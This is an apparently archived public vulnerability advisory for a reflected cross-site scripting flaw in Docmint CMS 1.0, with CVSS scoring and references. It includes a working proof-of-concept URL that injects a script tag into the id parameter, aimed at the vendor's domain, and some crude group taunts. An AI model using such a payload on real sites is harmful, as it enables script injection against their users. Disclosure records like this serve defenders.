Docmint CMS 1.0 cross site scripting

2010-01-13 / 2010-01-14
Credit: ./Red-D3v1L
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

+===================================================================================+ ./SEC-R1Z _ __ _ _ _ _ ___ _ _ _ _ __ _ _ _ _ _ / /_ _ _ _ / _ _/ _ _ / < |/_ _ _ _ / _ _ _ _/ /___ / / __ | |) / | | / / _ _ _ _/ /___ / / | __ || / | | / / _______ _ _ 2_0_0_9 | | | / /____ /_ _ _ _ _ _ _ _/ _ _ _ / |__| __ |__|/_ _ _ _ _ R.I.P MichaelJackson !!!!! +===================================================================================+ [?] ~ Note : sEc-r1z CrEw# r0x ! ============================================================================== [?] Docmint Cms 1.0 (XSS) Cross Site Scripting Vulnerability ============================================================================== [?] My home: [ http://sec-r1z.com ] [?] Script: [ Docmint Cms 1.0 ] [?] Language: [ PHP ] [?] Vendor [http://www.docmint.net/] [?] Founder: [ ./Red-D3v1L ] [?] Gr44tz to: [ sec-r1z# Crew - Hackteach Team - My L0ve ~A~ ] [?] Fuck To : [ Zombie_KsA << big big big L4m3r ] ######################################################################## ===[ Exploit XSS ]=== [&#187;]Exploit : [Path]/index.php?id=[XSS Vuln] [&#187;]dem0: http://www.docmint.net/index.php?id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E ============================================================================== #sEc-r1z.com Str1kEz y0u !

References:

http://xforce.iss.net/xforce/xfdb/55549
http://www.securityfocus.com/bid/37721
http://www.exploit-db.com/exploits/11119
http://secunia.com/advisories/38149
http://packetstormsecurity.org/1001-exploits/docmintcms-xss.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top